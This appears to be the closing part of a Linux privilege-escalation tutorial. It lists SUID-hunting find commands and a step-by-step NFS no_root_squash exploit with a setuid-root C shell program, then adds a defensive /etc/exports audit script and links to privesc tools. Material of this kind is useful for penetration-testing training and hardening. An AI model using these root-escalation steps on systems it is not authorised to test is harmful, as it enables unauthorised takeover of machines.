$ find / -type f -perm -u=rws 2>/dev/null
$ find / -type f -perm 777 2>/dev/null
$ find / -type f -perm -04000 2>/dev/null
$ find / -type d -perm -g=rws 2>/dev/null
$ find / -type d -perm -g=rwS 2>/dev/null
$ find / -type d -perm -06000 2>/dev/null
NFS Root Squashing :
Read the /etc/exports file. If you find a directory exported with no_root_squash, you can mount it as a client and write inside that directory as if you were the local root of the machine.
no_root_squash: this option gives the root user on the client the authority to access files on the NFS server as root, which can have serious security implications.
no_all_squash: similar to the no_root_squash option, but it applies to non-root users. Imagine you have a shell as the nobody user: check the /etc/exports file; the no_all_squash option is present; check the /etc/passwd file; emulate a non-root user listed there; create a SUID file as that user (by mounting over NFS); execute the SUID file as nobody and become that other user.
From the output, notice that the "no_root_squash" option is defined for the "/tmp" export.
Mount that directory on a client machine, copy the /bin/bash binary into the mounted folder as root and give it SUID rights, then execute that bash binary from the victim machine.
$ showmount -e 192.168.1.52
$ mkdir /tmp/1
$ mount -t nfs 192.168.1.52:/tmp/ /tmp/1/
$ vim /tmp/1/rootme.c
rootme.c:
#include <stdlib.h>
#include <unistd.h>
int main(void) { setgid(0); setuid(0); system("/bin/bash"); return 0; }
OR
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
int main(void) { setresuid(0, 0, 0); system("/bin/sh"); return 0; }
$ gcc /tmp/1/rootme.c -o /tmp/1/rootme
$ chmod +s /tmp/1/rootme
On the victim machine:
$ /tmp/rootme
$ id
Alternatively:
$ mkdir /tmp/nfsdir
$ mount -t nfs 192.168.1.52:/tmp /tmp/nfsdir
$ cd /tmp/nfsdir
$ cp /bin/bash .   (copy the wanted shell)
$ chmod +s bash   (set the SUID bit)
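An added example (not part of the original checklist): a POSIX shell function that parses an /etc/exports file and flags the settings the walkthrough above depends on, namely no_root_squash, no_all_squash, and read-write exports with no client restriction. The function names, finding labels and the constructed sample exports file (which reuses the page's 192.168.1.x addresses) are assumptions of this example.

```shell
#!/bin/sh
# exports_audit FILE: one finding per line; exit status 1 if anything was flagged.
#   NO-ROOT-SQUASH  client uid 0 stays uid 0 on the server (the default is root_squash)
#   NO-ALL-SQUASH   other client uids are trusted as-is
#   WORLD-RW        read-write export with no client restriction ('*' or none)
exports_audit() {
    out=$(
        set -f                                       # keep '*' hosts literal
        sed 's/#.*//' "$1" | grep -v '^[[:space:]]*$' |
        while read -r path clients; do
            [ -n "$clients" ] || clients='*'         # no client list means every host
            for spec in $clients; do
                host=${spec%%\(*}                    # "host(opts)" -> "host"
                opts=${spec#"$host"}                 # "(opts)" or ""
                opts=${opts#\(}; opts=${opts%\)}
                case ",$opts," in
                    *,no_root_squash,*) echo "NO-ROOT-SQUASH  $path -> ${host:-*} ($opts)" ;;
                esac
                case ",$opts," in
                    *,no_all_squash,*)  echo "NO-ALL-SQUASH   $path -> ${host:-*} ($opts)" ;;
                esac
                case "$host" in
                    ''|'*')
                        case ",$opts," in
                            *,rw,*) echo "WORLD-RW        $path -> ${host:-*} ($opts)" ;;
                        esac ;;
                esac
            done
        done
    )
    if [ -n "$out" ]; then
        printf '%s\n' "$out"
        return 1
    fi
    return 0
}

# Constructed sample /etc/exports (not from a real host).
make_demo_exports() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
# constructed sample, not a real host's exports
/tmp        *(rw,sync,no_root_squash)
/srv/share  192.168.1.0/24(rw,sync,root_squash) 192.168.1.61(rw,no_all_squash)
/srv/pub    *(ro)
/home       (rw)
EOF
    echo "$f"
}

f=$(make_demo_exports)
exports_audit "$f" || echo "-> use root_squash and an explicit client list; mount with nosuid on clients"
rm -f "$f"
```

The /tmp line produces two findings (no_root_squash and world read-write), /srv/share is reported only for the second client, and the read-only /srv/pub export is not reported at all.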
Tools & Links :
Finally, here are links to some automated tools and resources that can help with privilege escalation:
Tools :
LinPEAS - Linux Privilege Escalation Awesome Script - https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
LinEnum - https://github.com/rebootuser/LinEnum
LES - Linux Privilege Escalation Auditing Tool - https://github.com/mzet-/linux-exploit-suggester
linuxprivchecker.py - https://github.com/sleventyeleven/linuxprivchecker
Links :
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://github.com/swisskyrepo/PayloadsAllTheThings
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
https://payatu.com/guide-linux-privilege-escalation
https://gtfobins.github.io/
https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html
https://book.hacktricks.xyz/linux-unix/privilege-escalation
https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
Congratulations…. You are ROOT now….. ;-)
For any queries, contact me on my Twitter and LinkedIn profiles -